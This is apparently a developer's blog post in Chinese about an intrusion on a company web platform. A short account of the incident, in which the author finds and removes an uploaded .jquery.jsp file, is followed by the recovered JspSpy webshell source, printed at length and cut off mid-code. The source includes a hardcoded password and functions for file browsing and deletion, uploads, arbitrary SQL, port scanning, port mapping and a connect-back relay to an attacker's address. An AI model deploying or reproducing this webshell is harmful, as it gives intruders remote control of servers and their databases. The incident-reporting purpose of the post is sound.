入侵(暴风雨前的宁静)
下午阳光甚好,想趁着安静的周末静下心来写写代码。刚过一个小时,3点左右,客服MM找我,告知客户都在说平台登录不了(我们有专门的客户qq群)。看了下数据库连接数,正常。登录阿里云发现cpu居高不下。客户还在等着,只好先重启tomcat。重启后平台登录正常。本以为是用户导数据或者连接池被占用光了(这个以前出现过,也比较坑),重启下就会没事。
15分钟左右,客服MM又找我,说平台打开很慢。
我打开登录页面,加载都很慢,这时候还不知道是什么问题,上阿里云看了看,发现有攻击。
看了下攻击的访问url,访问的是一个名为 .jquery.jsp 的文件。通过ftp查看该文件,发现里面写着一个密码,直接通过地址访问并用它登录,这一登录不得了:网站目录全部显示在页面上,还可以进行操作(从代码里的 JspSpy 标识可以看出,这就是一个被上传的 webshell)。赶紧把文件下载下来一份留作证据,然后把它删除掉。
<%@page pageEncoding="utf-8"%>
<%@page import ="java.io.*"%>
<%@page import ="java.util.*"%>
<%@page import ="java.util.regex.*"%>
<%@page import ="java.sql.*"%>
<%@page import ="java.lang.reflect.*"%>
<%@page import ="java.nio.charset.*"%>
<%@page import ="javax.servlet.http.HttpServletRequestWrapper"%>
<%@page import ="java.text.*"%>
<%@page import ="java.net.*"%>
<%@page import ="java.util.zip.*"%>
<%@page import ="java.util.jar.*"%>
<%@page import ="java.awt.*"%>
<%@page import ="java.awt.image.*"%>
<%@page import ="javax.imageio.*"%>
<%@page import ="java.awt.datatransfer.DataFlavor"%>
<%@page import ="java.util.prefs.Preferences"%>
<%!private static final String PW = "good";// password private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; private static final String REQUEST_CHARSET = "ISO-8859-1"; private static final String PAGE_CHARSET = "UTF-8"; private static final String CURRENT_DIR = "currentdir"; private static final String MSG = "SHOWMSG"; private static final String PORT_MAP = "PMSA"; private static final String DBO = "DBO"; private static final String SHELL_ONLINE = "SHELL_ONLINE"; private static final String ENTER = "ENTER_FILE"; private static final String ENTER_MSG = "ENTER_FILE_MSG"; private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; private static final String SESSION_O = "SESSION_O"; private static String SHELL_NAME = ""; private static String WEB_ROOT = null ; private static String SHELL_DIR = null ; public static Map ins = new HashMap(); private static boolean ISLINUX = false ; private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. 
Please Logout."; private static final String BACK_HREF = " Back "; private static class MyRequest extends HttpServletRequestWrapper { public MyRequest(HttpServletRequest req) { super (req);} public String getParameter(String name) { try {String value = super .getParameter(name); if (name == null ) return null ; return new String(value.getBytes(REQUEST_CHARSET), PAGE_CHARSET);} catch (Exception e) { return null ;}}} private static class SpyClassLoader extends ClassLoader { public SpyClassLoader() {} public Class defineClass(String name, byte [] b) { return super .defineClass(name, b, 0, b.length - 2);}} private static class DBOperator { private Connection conn = null ; private Statement stmt = null ; private String driver; private String url; private String uid; private String pwd; public DBOperator(String driver, String url, String uid, String pwd) throws Exception { this (driver, url, uid, pwd, false );} public DBOperator(String driver, String url, String uid, String pwd, boolean connect) throws Exception {Class.forName(driver); if (connect) this .conn = DriverManager.getConnection(url, uid, pwd); this .url = url; this .driver = driver; this .uid = uid; this .pwd = pwd;} public void connect() throws Exception { this .conn = DriverManager.getConnection(url, uid, pwd);} public Object execute(String sql) throws Exception { if (isValid()) {stmt = conn.createStatement(); if (stmt.execute(sql)) { return stmt.getResultSet();} else { return "" + stmt.getUpdateCount();}} throw new Exception("Connection is inValid.");} public void closeStmt() throws Exception { if (this .stmt != null )stmt.close();} public boolean isValid() throws Exception { return conn != null && !conn.isClosed();} public void close() throws Exception { if (isValid()) {closeStmt();conn.close();}} public boolean equals(Object o) { if (o instanceof DBOperator) {DBOperator dbo = (DBOperator) o; return this .driver.equals(dbo.driver) && this .url.equals(dbo.url) && this .uid.equals(dbo.uid) && this 
.pwd.equals(dbo.pwd);} return false ;} public Connection getConn() { return this .conn;}} private static class StreamConnector extends Thread { private InputStream is; private OutputStream os; public StreamConnector(InputStream is, OutputStream os) { this .is = is; this .os = os;} public void run() {BufferedReader in = null ;BufferedWriter out = null ; try {in = new BufferedReader(new InputStreamReader(this .is));out = new BufferedWriter(new OutputStreamWriter(this .os)); char buffer[] = new char [8192]; int length; while ((length = in.read(buffer, 0, buffer.length)) > 0) {out.write(buffer, 0, length);out.flush();}} catch (Exception e) {} try { if (in != null )in.close(); if (out != null )out.close();} catch (Exception e) {}} public static void readFromLocal(final DataInputStream localIn, final DataOutputStream remoteOut) { new Thread(new Runnable() { public void run() { while (true ) { try { byte [] data = new byte [100]; int len = localIn.read(data); while (len != -1) {remoteOut.write(data, 0, len);len = localIn.read(data);}} catch (Exception e) { break ;}}}}).start();} public static void readFromRemote(final Socket soc, final Socket remoteSoc, final DataInputStream remoteIn, final DataOutputStream localOut) { new Thread(new Runnable() { public void run() { while (true ) { try { byte [] data = new byte [100]; int len = remoteIn.read(data); while (len != -1) {localOut.write(data, 0, len);len = remoteIn.read(data);}} catch (Exception e) { try {soc.close();remoteSoc.close();} catch (Exception ex) {} break ;}}}}).start();}} private static class EnterFile extends File { private ZipFile zf = null ; private ZipEntry entry = null ; private boolean isDirectory = false ; private String absolutePath = null ; public void setEntry(ZipEntry e) { this .entry = e;} public void setAbsolutePath(String p) { this .absolutePath = p;} public void close() throws Exception { this .zf.close();} public void setZf(String p) throws Exception { if (p.toLowerCase().endsWith(".jar")) this .zf 
= new JarFile(p); else this .zf = new ZipFile(p);} public EnterFile(File parent, String child) { super (parent, child);} public EnterFile(String pathname) { super (pathname);} public EnterFile(String pathname, boolean isDir) { this (pathname); this .isDirectory = isDir;} public EnterFile(String parent, String child) { super (parent, child);} public EnterFile(URI uri) { super (uri);} public boolean exists() { return new File(this .zf.getName()).exists();} public File[] listFiles() {java.util.List list = new ArrayList();java.util.List handled = new ArrayList();String currentDir = super .getPath();currentDir = currentDir.replace('\\', '/'); if (currentDir.indexOf("/") == 0) { if (currentDir.length() > 1)currentDir = currentDir.substring(1); else currentDir = "";}Enumeration e = this .zf.entries(); while (e.hasMoreElements()) {ZipEntry entry = (ZipEntry) e.nextElement();String eName = entry.getName(); if (this .zf instanceof JarFile) { if (!entry.isDirectory()) {EnterFile ef = new EnterFile(eName);ef.setEntry(entry); try {ef.setZf( this .zf.getName());} catch (Exception ex) {}list.add(ef);}} else { if (currentDir.equals("")) { // zip root directory if (eName.indexOf("/") == -1|| eName.matches("[^/]+/$")) {EnterFile ef = new EnterFile(eName.replaceAll("/", ""));handled.add(eName.replaceAll( "/", ""));ef.setEntry(entry);list.add(ef);} else { if (eName.indexOf("/") != -1) {String tmp = eName.substring(0, eName.indexOf( "/")); if (!handled.contains(tmp) && !Util.isEmpty(tmp)) {EnterFile ef = new EnterFile(tmp, true );ef.setEntry(entry);list.add(ef);handled.add(tmp);}}}} else { if (eName.startsWith(currentDir)) { if (eName.matches(currentDir + "/[^/]+/?$")) { // file. 
EnterFile ef = new EnterFile(eName);ef.setEntry(entry);list.add(ef); if (eName.endsWith("/")) {String tmp = eName.substring(eName.lastIndexOf( '/',eName.length() - 2));tmp = tmp.substring(1, tmp.length() - 1);handled.add(tmp);}} else { // dir try {String tmp = eName.substring(currentDir.length() + 1);tmp = tmp.substring(0, tmp.indexOf('/')); if (!handled.contains(tmp) && !Util.isEmpty(tmp)) {EnterFile ef = new EnterFile(tmp, true );ef.setAbsolutePath(currentDir + "/"+ tmp);ef.setEntry(entry);list.add(ef);handled.add(tmp);}} catch (Exception ex) {}}}}}} return (File[]) list.toArray(new File[0]);} public boolean isDirectory() { return this .entry.isDirectory() || this .isDirectory;} public String getParent() { return "";} public String getAbsolutePath() { return absolutePath != null ? absolutePath : super .getPath();} public String getName() { if (this .zf instanceof JarFile) { return this .getAbsolutePath();} else { return super .getName();}} public long lastModified() { return entry.getTime();} public boolean canRead() { return false ;} public boolean canWrite() { return false ;} public boolean canExecute() { return false ;} public long length() { return entry.getSize();}} private static class OnLineProcess { private String cmd = "first"; private Process pro; public OnLineProcess(Process p) { this .pro = p;} public void setPro(Process p) { this .pro = p;} public void setCmd(String c) { this .cmd = c;} public String getCmd() { return this .cmd;} public Process getPro() { return this .pro;} public void stop() { this .pro.destroy();}} private static class OnLineConnector extends Thread { private OnLineProcess ol = null ; private InputStream is; private OutputStream os; private String name; public OnLineConnector(InputStream is, OutputStream os, String name,OnLineProcess ol) { this .is = is; this .os = os; this .name = name; this .ol = ol;} public void run() {BufferedReader in = null ;BufferedWriter out = null ; try {in = new BufferedReader(new InputStreamReader(this 
.is));out = new BufferedWriter(new OutputStreamWriter(this .os)); char buffer[] = new char [128]; if (this .name.equals("exeRclientO")) { // from exe to client int length = 0; while ((length = in.read(buffer, 0, buffer.length)) > 0) {String str = new String(buffer, 0, length);str = str.replaceAll("&", "&").replaceAll("<", "<").replaceAll(">", ">");str = str.replaceAll("" + (char ) 13 + (char ) 10, " ");str = str.replaceAll("\n", " ");out.write(str.toCharArray(), 0, str.length());out.flush();}} else { // from client to exe while (true ) { while (this .ol.getCmd() == null ) {Thread.sleep( 500);} if (this .ol.getCmd().equals("first")) { this .ol.setCmd(null ); continue ;} this .ol.setCmd(this .ol.getCmd() + (char ) 10); char [] arr = this .ol.getCmd().toCharArray();out.write(arr, 0, arr.length);out.flush(); this .ol.setCmd(null );}}} catch (Exception e) {} try { if (in != null )in.close(); if (out != null )out.close();} catch (Exception e) {}}} private static class Table { private ArrayList rows = null ; private boolean echoTableTag = false ; public void setEchoTableTag(boolean v) { this .echoTableTag = v;} public Table() { this .rows = new ArrayList();} public void addRow(Row r) { this .rows.add(r);} public String toString() {StringBuffer html = new StringBuffer(); if (echoTableTag)html.append( " "); for (int i = 0; i < rows.size(); i++) {Row r = (Row) rows.get(i);html.append( "");ArrayList columns = r.getColumns(); for (int a = 0; a < columns.size(); a++) {Column c = (Column) columns.get(a);html.append( "");String vv = Util.htmlEncode(Util.getStr(c.getValue())); if (vv.equals(""))vv = " ";html.append(vv);html.append( " ");}html.append( " ");} if (echoTableTag)html.append( "
"
); return html.toString();} public static String rs2Table(ResultSet rs, String sep,
boolean op) throws Exception {StringBuffer table =
new StringBuffer();ResultSetMetaData meta =
rs.getMetaData(); int count =
meta.getColumnCount(); if (!
op)table.append( "
View Struct -
View All Tables "
); else table.append( "
All Tables "
);table.append( ""
);table.append( "
"); for (int i = 1; i <= count; i++) {table.append( "" + meta.getColumnName(i) + " ");} if (op)table.append( " ");table.append( " "); while (rs.next()) {String tbName = null ;table.append( ""); for (int i = 1; i <= count; i++) {String v = rs.getString(i); if (i == 3)tbName = v;table.append( "" + Util.null2Nbsp(v) + " ");} if (op)table.append( " tbName+ "')\">View | tbName+ "'})\">Struct | tbName+ "'})\">Export | Save To File ");table.append( " ");}table.append( "
"
); return table.toString();}} private static class Row { private ArrayList cols =
null ; public Row() { this .cols =
new ArrayList();} public void addColumn(Column n) { this .cols.add(n);} public ArrayList getColumns() { return this .cols;}} private static class Column { private String value; public Column(String v) { this .value =
v;} public String getValue() { return this .value;}} private static class Util { public static boolean isEmpty(String s) { return s ==
null || s.trim().equals(""
);} public static boolean isEmpty(Object o) { return o ==
null ||
isEmpty(o.toString());} public static String getSize(
long size,
char danwei) { if (danwei == 'M'
) { double v = formatNumber(size / 1024.0 / 1024.0, 2
); if (v > 1024
) { return getSize(size, 'G'
);} else { return v + "M"
;}} else if (danwei == 'G'
) { return formatNumber(size / 1024.0 / 1024.0 / 1024.0, 2) + "G"
;} else if (danwei == 'K'
) { double v = formatNumber(size / 1024.0, 2
); if (v > 1024
) { return getSize(size, 'M'
);} else { return v + "K"
;}} else if (danwei == 'B'
) { if (size > 1024
) { return getSize(size, 'K'
);} else { return size + "B"
;}} return "" + 0 +
danwei;} public static boolean exists(String[] arr, String v) { for (
int i = 0; i < arr.length; i++
) { if (v.equals(arr[i])) { return true ;}} return false ;} public static double formatNumber(
double value,
int l) {NumberFormat format =
NumberFormat.getInstance();format.setMaximumFractionDigits(l);format.setGroupingUsed( false ); return new Double(format.format(value)).doubleValue();} public static boolean isInteger(String v) { if (isEmpty(v)) return false ; return v.matches("^\\d+$"
);} public static String formatDate(
long time) {SimpleDateFormat format =
new SimpleDateFormat( "yyyy-MM-dd hh:mm:ss"
); return format.format(
new java.util.Date(time));} public static String convertPath(String path) { return path !=
null ? path.replace('\\', '/') : ""
;} public static String htmlEncode(String v) { if (isEmpty(v)) return ""
; return v.replaceAll("&", "&").replaceAll("<", "<"
).replaceAll( ">", ">"
);} public static String getStr(String s) { return s ==
null ? ""
: s;} public static String null2Nbsp(String s) { if (s ==
null )s = " "
; return s;} public static String getStr(Object s) { return s ==
null ? ""
: s.toString();} public static String exec(String regex, String str,
int group) {Pattern pat =
Pattern.compile(regex);Matcher m =
pat.matcher(str); if (m.find()) return m.group(group); return null ;} public static void outMsg(Writer out, String msg)
throws Exception {outMsg(out, msg, "center"
);} public static void outMsg(Writer out, String msg, String align) throws Exception {out.write( " align+ ";font-weight:bold;margin:10px\">"+
msg + ""
);} public static String highLight(String str) {str =
str.replaceAll( "\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b"
, "
$1 "
);str = str.replaceAll("\t(//.+)"
, "\t
$1 "
); return str;}} private static class UploadBean { private String fileName =
null ; private String suffix =
null ; private String savePath = ""
; private ServletInputStream sis =
null ; private OutputStream targetOutput =
null ; private byte [] b =
new byte [1024
]; public void setTargetOutput(OutputStream stream) { this .targetOutput =
stream;} public UploadBean() {} public void setSavePath(String path) { this .savePath =
path;} public String getFileName() { return this .fileName;} public void parseRequest(HttpServletRequest request)
throws IOException {sis =
request.getInputStream(); int a = 0
; int k = 0
;String s = ""
; while ((a = sis.readLine(b, 0, b.length)) != -1
) {s =
new String(b, 0
, a, PAGE_CHARSET); if ((k = s.indexOf("filename=\"")) != -1
) {s = s.substring(k + 10
);k = s.indexOf("\""
);s = s.substring(0
, k);File tF =
new File(s); if (tF.isAbsolute()) {fileName =
tF.getName();} else {fileName =
s;}k = s.lastIndexOf("."
);suffix = s.substring(k + 1
);upload();}}} private void upload()
throws IOException { try {OutputStream out =
null ; if (
this .targetOutput !=
null )out =
this .targetOutput; else out =
new FileOutputStream(
new File(savePath, fileName)); int a = 0
; int k = 0
;String s = ""
; while ((a = sis.readLine(b, 0, b.length)) != -1
) {s =
new String(b, 0
, a); if ((k = s.indexOf("Content-Type:")) != -1
) { break ;}}sis.readLine(b, 0
, b.length); while ((a = sis.readLine(b, 0, b.length)) != -1
) {s =
new String(b, 0
, a); if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45
) && (b[3] == 45) && (b[4] == 45
)) { break ;}out.write(b, 0
, a);} if (out
instanceof FileOutputStream)out.close();} catch (IOException ioe) { throw ioe;}}} %>
<%
SHELL_NAME =
request.getServletPath().substring(request.getServletPath().lastIndexOf( "/") + 1
);String myAbsolutePath =
application.getRealPath(request.getServletPath()); if (Util.isEmpty(myAbsolutePath)) {
// for weblogic SHELL_NAME =
request.getServletPath();myAbsolutePath =
new File(application.getResource("/"
).getPath() +
SHELL_NAME).toString();SHELL_NAME = request.getContextPath() +
SHELL_NAME;WEB_ROOT =
new File(application.getResource("/"
).getPath()).toString();} else {WEB_ROOT = application.getRealPath("/"
);}SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0
,myAbsolutePath.lastIndexOf(File.separator))); if (SHELL_DIR.indexOf('/') == 0
)ISLINUX =
true ; else ISLINUX =
false ; if (session.getAttribute(CURRENT_DIR) ==
null )session.setAttribute(CURRENT_DIR, Util.convertPath(SHELL_DIR)); // request = new MyRequest(request); if (session.getAttribute(PW_SESSION_ATTRIBUTE) ==
null || !
(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {String o = request.getParameter("o"
); if (o !=
null )o =
new String(o.getBytes(REQUEST_CHARSET), PAGE_CHARSET); if (o !=
null && o.equals("login"
)) {((Invoker) ins.get( "login"
)).invoke(request, response,session); return ;} else if (o !=
null && o.equals("vLogin"
)) {((Invoker) ins.get( "vLogin"
)).invoke(request, response,session); return ;} else {((Invoker) ins.get( "vLogin"
)).invoke(request, response,session); return ;}}
%>
<%!
private static interface Invoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception; public boolean doBefore(); public boolean doAfter();} private static class DefaultInvoker
implements Invoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception {} public boolean doBefore() { return true ;} public boolean doAfter() { return true ;}} private static class ScriptInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( ""
);} catch (Exception e) { throw e;}}} private static class BeforeInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
JspSpy "
);} catch (Exception e) { throw e;}}} private static class AfterInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( ""
);} catch (Exception e) { throw e;}}} private static class DeleteBatchInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String files = request.getParameter("files"
); int success = 0
; int failed = 0
; if (!
Util.isEmpty(files)) {String currentDir =
JSession.getAttribute(CURRENT_DIR).toString();String[] arr = files.split(","
); for (
int i = 0; i < arr.length; i++
) {String fs =
arr[i];File f =
new File(currentDir, fs); if (f.delete())success += 1
; else failed += 1
;}}JSession.setAttribute(MSG,success + " Files Deleted
Success , "+
failed + " Files Deleted
Failed !"
);response.sendRedirect(SHELL_NAME);} catch (Exception e) { throw e;}}} private static class ClipBoardInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
"
);} catch (Exception e) { throw e;}}} private static class VPortScanInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String ip = request.getParameter("ip"
);String ports = request.getParameter("ports"
);String timeout = request.getParameter("timeout"
);String banner = request.getParameter("banner"
); if (Util.isEmpty(ip))ip = "127.0.0.1"
; if (Util.isEmpty(ports))ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"
; if (Util.isEmpty(timeout))timeout = "2"
;out.println( "
"
);} catch (Exception e) { throw e;}}} private static class PortScanInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();((Invoker) ins.get( "vPortScan"
)).invoke(request, response,JSession);out.println( "
"
);String ip = request.getParameter("ip"
);String ports = request.getParameter("ports"
);String timeout = request.getParameter("timeout"
);String banner = request.getParameter("banner"
); int iTimeout = 0
; if (Util.isEmpty(ip) ||
Util.isEmpty(ports)) return ; if (!
Util.isInteger(timeout)) {timeout = "2"
;}iTimeout =
Integer.parseInt(timeout);Map rs =
new LinkedHashMap();String[] portArr = ports.split(","
); for (
int i = 0; i < portArr.length; i++
) {String port =
portArr[i];BufferedReader r =
null ; try {Socket s =
new Socket();s.connect( new InetSocketAddress(ip, Integer.parseInt(port)), iTimeout);s.setSoTimeout(iTimeout); if (!
Util.isEmpty(banner)) {r =
new BufferedReader(
new InputStreamReader(s.getInputStream()));StringBuffer sb =
new StringBuffer();String b =
r.readLine(); while (b !=
null ) {sb.append(b + " "
); try {b =
r.readLine();} catch (Exception e) { break ;}}rs.put(port, "Open
"+ sb.toString() + " "
);r.close();} else {rs.put(port, "Open"
);}s.close();} catch (Exception e) { if (e.toString().toLowerCase().indexOf( "read timed out") != -1
) {rs.put(port, "Open
<<No Banner!>> "
); if (r !=
null )r.close();} else {rs.put(port, "Close"
);}}}out.println( ""
);Set entrySet =
rs.entrySet();Iterator it =
entrySet.iterator(); while (it.hasNext()) {Map.Entry e =
(Map.Entry) it.next();String port =
(String) e.getKey();String value =
(String) e.getValue();out.println(ip + " : " +
port + " .................................
)+ ">" + value + " "
);}out.println( ""
);} catch (Exception e) { throw e;}}} private static class VConnInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();Object obj =
JSession.getAttribute(DBO); if (obj ==
null || !
((DBOperator) obj).isValid()) {out.println( " "
);out.println( "
"
);} else {((Invoker) ins.get( "dbc"
)).invoke(request, response,JSession);}} catch (ClassCastException e) { throw e;} catch (Exception e) { throw e;}}} // DBConnect private static class DbcInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String driver = request.getParameter("driver"
);String url = request.getParameter("url"
);String uid = request.getParameter("uid"
);String pwd = request.getParameter("pwd"
);String sql = request.getParameter("sql"
);String selectDb = request.getParameter("selectDb"
); if (selectDb ==
null )selectDb = JSession.getAttribute("selectDb"
).toString(); else JSession.setAttribute( "selectDb"
, selectDb);Object dbo =
JSession.getAttribute(DBO); if (dbo ==
null || !
((DBOperator) dbo).isValid()) { if (dbo !=
null )((DBOperator) dbo).close();dbo =
new DBOperator(driver, url, uid, pwd,
true );} else { if (!Util.isEmpty(driver) && !
Util.isEmpty(url) && !
Util.isEmpty(uid)) {DBOperator oldDbo =
(DBOperator) dbo;dbo =
new DBOperator(driver, url, uid, pwd); if (!
oldDbo.equals(dbo)) {((DBOperator) oldDbo).close();((DBOperator) dbo).connect();} else {dbo =
oldDbo;}}}DBOperator Ddbo =
(DBOperator) dbo;JSession.setAttribute(DBO, Ddbo); if (!Util.isEmpty(request.getParameter("type"
)) && request.getParameter("type").equals("switch"
)) {Ddbo.getConn().setCatalog(request.getParameter( "catalog"
));}Util.outMsg(out, "Connect To DataBase Success!"
);out.println( " "
);out.println( "
"+ "");DatabaseMetaData meta = Ddbo.getConn().getMetaData();out.println( "
"
); if (Util.isEmpty(sql)) {String type = request.getParameter("type"
); if (Util.isEmpty(type) || type.equals("switch"
)) {ResultSet tbs = meta.getTables(
null ,
null ,
null ,
null );out.println(Table.rs2Table(tbs, meta.getIdentifierQuoteString(), true ));tbs.close();} else if (type.equals("struct"
)) {String tb = request.getParameter("table"
); if (Util.isEmpty(tb)) return ;ResultSet t = meta.getColumns(
null ,
null , tb,
null );out.println(Table.rs2Table(t, "",
false ));t.close();}}} catch (Exception e) {JSession.setAttribute(MSG, "
Some Error Occurred. Please Check Out the StackTrace Follow. "+
BACK_HREF); throw e;}}} private static class ExecuteSQLInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String sql = request.getParameter("sql"
);String db = request.getParameter("selectDb"
);Object dbo =
JSession.getAttribute(DBO); if (!
Util.isEmpty(sql)) { if (dbo ==
null || !
((DBOperator) dbo).isValid()) {((Invoker) ins.get( "vConn"
)).invoke(request, response,JSession); return ;} else {((Invoker) ins.get( "dbc"
)).invoke(request, response,JSession);Object obj =
((DBOperator) dbo).execute(sql); if (obj
instanceof ResultSet) {ResultSet rs =
(ResultSet) obj;ResultSetMetaData meta =
rs.getMetaData(); int colCount =
meta.getColumnCount();out.println( "
Query#0 : "+ Util.htmlEncode(sql) + " "
);out.println( "
"); for (int i = 1; i <= colCount; i++) {out.println( ""+ meta.getColumnName(i) + ""+ meta.getColumnTypeName(i) + " ");}out.println( " ");Table tb = new Table(); while (rs.next()) {Row r = new Row(); for (int i = 1; i <= colCount; i++) {String v = null ; try {v = rs.getString(i);} catch (SQLException ex) {v = "<>";}r.addColumn( new Column(v));}tb.addRow(r);}out.println(tb.toString());out.println( "
"
);rs.close();((DBOperator) dbo).closeStmt();} else {out.println( "
affected rows : "+ obj + " "
);}}} else {((Invoker) ins.get( "dbc"
)).invoke(request, response,JSession);}} catch (Exception e) { throw e;}}} private static class VLoginInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();out.println( "
jspspy SHELL_NAME+ "\">"+ ""+ " Password: "+ " "+ " "+ " "+ " "+ "
"+ " "
);} catch (Exception e) { throw e;}}} private static class LoginInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String inputPw = request.getParameter("pw"
); if (Util.isEmpty(inputPw) || !
inputPw.equals(PW)) {((Invoker) ins.get( "vLogin"
)).invoke(request, response,JSession); return ;} else {JSession.setAttribute(PW_SESSION_ATTRIBUTE, inputPw);response.sendRedirect(SHELL_NAME); return ;}} catch (Exception e) { throw e;}}} private static class MyComparator
implements Comparator { public int compare(Object obj1, Object obj2) { try { if (obj1 !=
null && obj2 !=
null ) {File f1 =
(File) obj1;File f2 =
(File) obj2; if (f1.isDirectory()) { if (f2.isDirectory()) { return f1.getName().compareTo(f2.getName());} else { return -1
;}} else { if (f2.isDirectory()) { return 1
;} else { return f1.getName().toLowerCase().compareTo(f2.getName().toLowerCase());}}} return 0
;} catch (Exception e) { return 0
;}}} private static class FileListInvoker
extends DefaultInvoker { public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String path2View =
null ;PrintWriter out =
response.getWriter();String path = request.getParameter("folder"
);String outEntry = request.getParameter("outentry"
); if (!Util.isEmpty(outEntry) && outEntry.equals("true"
)) {JSession.removeAttribute(ENTER);JSession.removeAttribute(ENTER_MSG);JSession.removeAttribute(ENTER_CURRENT_DIR);}Object enter =
JSession.getAttribute(ENTER);File file =
null ; if (!
Util.isEmpty(enter)) { if (Util.isEmpty(path)) { if (JSession.getAttribute(ENTER_CURRENT_DIR) ==
null )path = "/"
; else path =
(String) (JSession.getAttribute(ENTER_CURRENT_DIR));}file =
new EnterFile(path);((EnterFile) file).setZf((String) enter);JSession.setAttribute(ENTER_CURRENT_DIR, path);} else { if (Util.isEmpty(path))path =
JSession.getAttribute(CURRENT_DIR).toString();JSession.setAttribute(CURRENT_DIR, Util.convertPath(path));file =
new File(path);}path2View =
Util.convertPath(path); if (!
file.exists()) { throw new Exception(path + "Dont Exists !"
);}File[] list =
file.listFiles();Arrays.sort(list, new MyComparator());out.println( ""
);String cr =
null ; try {cr =
JSession.getAttribute(CURRENT_DIR).toString().substring( 0, 3
);} catch (Exception e) {cr = "/"
;}File currentRoot =
new File(cr);out.println( "
File Manager - Current disk ""+ (cr.indexOf("/") == 0 ? "/" : currentRoot.getPath()) + "" total (unknow) "
);out.println( "
SHELL_NAME+ "\" method=\"post\">"+ "" + " "
);out.println( "
"+ " " + "" + "" + ""+ ""
);String targetIP = request.getParameter("targetIP"
);String targetPort = request.getParameter("targetPort"
);String yourIP = request.getParameter("yourIP"
);String yourPort = request.getParameter("yourPort"
); if (Util.isEmpty(targetIP))targetIP = "127.0.0.1"
; if (Util.isEmpty(targetPort))targetPort = "3389"
; if (Util.isEmpty(yourIP))yourIP =
request.getRemoteAddr(); if (Util.isEmpty(yourPort))yourPort = "1234"
;out.println( "
SHELL_NAME+ "\" method=\"post\">"+ " "+ " "+ " "+ " Port Back >> "+ " "+ " "+ " " + " " + " " + "
"+ " "
);} catch (Exception e) { throw e;}}} // StopMapPort private static class SmpInvoker
extends DefaultInvoker { public boolean doAfter() { return true ;} public boolean doBefore() { return true ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {Object obj =
JSession.getAttribute(PORT_MAP); if (obj !=
null ) {ServerSocket server =
(ServerSocket) JSession.getAttribute(PORT_MAP);server.close();}JSession.setAttribute( "done", "Stop Success!"
);((Invoker) ins.get( "vmp"
)).invoke(request, response, JSession);} catch (Exception e) { throw e;}}} // PortBack private static class PortBackInvoker
extends DefaultInvoker { public boolean doAfter() { return true ;} public boolean doBefore() { return true ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {String targetIP = request.getParameter("targetIP"
);String targetPort = request.getParameter("targetPort"
);String yourIP = request.getParameter("yourIP"
);String yourPort = request.getParameter("yourPort"
);Socket yourS =
new Socket();yourS.connect( new InetSocketAddress(yourIP, Integer.parseInt(yourPort)));Socket targetS =
new Socket();targetS.connect( new InetSocketAddress(targetIP, Integer.parseInt(targetPort)));StreamConnector.readFromLocal( new DataInputStream(targetS.getInputStream()), new DataOutputStream(yourS.getOutputStream()));StreamConnector.readFromRemote(targetS, yourS, new DataInputStream(yourS.getInputStream()), new DataOutputStream(targetS.getOutputStream()));JSession.setAttribute( "done", "Port Back Success !"
);((Invoker) ins.get( "vmp"
)).invoke(request, response, JSession);} catch (Exception e) { throw e;}}} private static class MapPortInvoker
extends DefaultInvoker { public boolean doBefore() { return false ;} public boolean doAfter() { return false ;} public void invoke(HttpServletRequest request,HttpServletResponse response, HttpSession JSession) throws Exception { try {PrintWriter out =
response.getWriter();String localIP = request.getParameter("localIP"
);String localPort = request.getParameter("localPort"
); final String remoteIP = request.getParameter("remoteIP"
); final String remotePort = request.getParameter("remotePort"
); if (Util.isEmpty(localIP) ||
Util.isEmpty(localPort) || Util.isEmpty(remoteIP) ||
Util.isEmpty(remotePort)) return ;Object obj =
JSession.getAttribute(PORT_MAP); if (obj !=
null ) {ServerSocket s =
(ServerSocket) obj;s.close();} final ServerSocket server =
new ServerSocket();server.bind( new InetSocketAddress(localIP, Integer.parseInt(localPort)));JSession.setAttribute(PORT_MAP, server); new Thread(
new Runnable() { public void run() { while (
true ) {Socket soc =
